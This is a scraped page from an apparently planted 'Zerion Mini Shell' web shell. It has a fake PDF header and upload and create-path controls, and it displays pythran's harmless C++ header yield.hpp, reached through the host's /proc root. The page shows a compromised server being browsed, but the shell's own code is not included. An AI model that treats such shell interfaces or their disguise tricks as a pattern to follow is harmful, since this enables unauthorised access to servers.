%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/985914/root/usr/lib/python3/dist-packages/pythran/pythonic/include/utils/
Upload File :
Create Path :
Current File : //proc/985914/root/usr/lib/python3/dist-packages/pythran/pythonic/include/utils/yield.hpp

#ifndef PYTHRAN_INCLUDE_UTILS_YIELD_HPP
#define PYTHRAN_INCLUDE_UTILS_YIELD_HPP

/*
 * This contains base class for yielders
 */

#include "pythonic/include/types/generator.hpp"

PYTHONIC_NS_BEGIN
class yielder
{
public:
  yielder();

  bool operator!=(yielder const &other) const;
  bool operator==(yielder const &other) const;

  long __generator_state;
};
PYTHONIC_NS_END

#endif

Zerion Mini Shell 1.0